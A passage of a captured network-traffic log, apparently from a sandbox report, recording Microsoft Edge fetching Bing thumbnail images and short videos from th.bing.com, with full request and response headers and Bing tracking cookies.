cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 16331
x-check-cacheable: YES
cache-control: public, max-age=2592000
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504e03
GET

https://th.bing.com/th?id=OSK.TMLNNsKAu8Kpk_lwr5jCr0jkVd-ZDBwT_zMgeCibDxkJxv8&w=150&h=220&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.TMLNNsKAu8Kpk_lwr5jCr0jkVd-ZDBwT_zMgeCibDxkJxv8&w=150&h=220&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5400
x-check-cacheable: YES
cache-control: public, max-age=515450
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504df9
GET

https://th.bing.com/th?id=OSK.TMLNuSu6eL625Q2EklnX_l4bg5Re0f3LogiBAcnAR3VoVr8&w=150&h=220&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.TMLNuSu6eL625Q2EklnX_l4bg5Re0f3LogiBAcnAR3VoVr8&w=150&h=220&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8697
x-check-cacheable: YES
cache-control: public, max-age=12781
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504e02
GET

https://th.bing.com/th?id=OSK.G17LKgnZZnLcZsAx4jJJNX8QFSkhCIBxY7tjaKPsQnI&w=184&h=69&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.G17LKgnZZnLcZsAx4jJJNX8QFSkhCIBxY7tjaKPsQnI&w=184&h=69&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5634
x-check-cacheable: YES
cache-control: public, max-age=1690970
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504e2a
GET

https://th.bing.com/th?id=OM.qSiAn2rL_oXwYA_1729958581&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OM.qSiAn2rL_oXwYA_1729958581&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://www.bing.com/
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
range: bytes=0-

Response

HTTP/2.0 206

content-type: video/mp4
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-range: bytes 0-584477/584478
content-length: 584478
x-check-cacheable: YES
cache-control: public, max-age=1575491
date: Wed, 04 Dec 2024 10:09:04 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306944.4050609b
GET

https://th.bing.com/th?id=OM.O7VMvp4ASRTmtQ_1730437955&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OM.O7VMvp4ASRTmtQ_1730437955&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://www.bing.com/
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
range: bytes=0-

Response

HTTP/2.0 206

content-type: video/mp4
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-range: bytes 0-279440/279441
content-length: 279441
x-check-cacheable: YES
cache-control: public, max-age=1222102
date: Wed, 04 Dec 2024 10:09:05 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306945.405064cd
GET

https://th.bing.com/th?id=OM.QxGHtGzYVpy0Ow_1723947821&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OM.QxGHtGzYVpy0Ow_1723947821&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://www.bing.com/
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
range: bytes=0-

Response

HTTP/2.0 206

content-type: video/mp4
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-range: bytes 0-323139/323140
content-length: 323140
x-check-cacheable: YES
cache-control: public, max-age=1837145
date: Wed, 04 Dec 2024 10:09:07 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306947.40507215
GET

https://th.bing.com/th?id=OM.1KoGchzMzsnwlw_1731963521&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OM.1KoGchzMzsnwlw_1731963521&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: video
referer: https://www.bing.com/
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
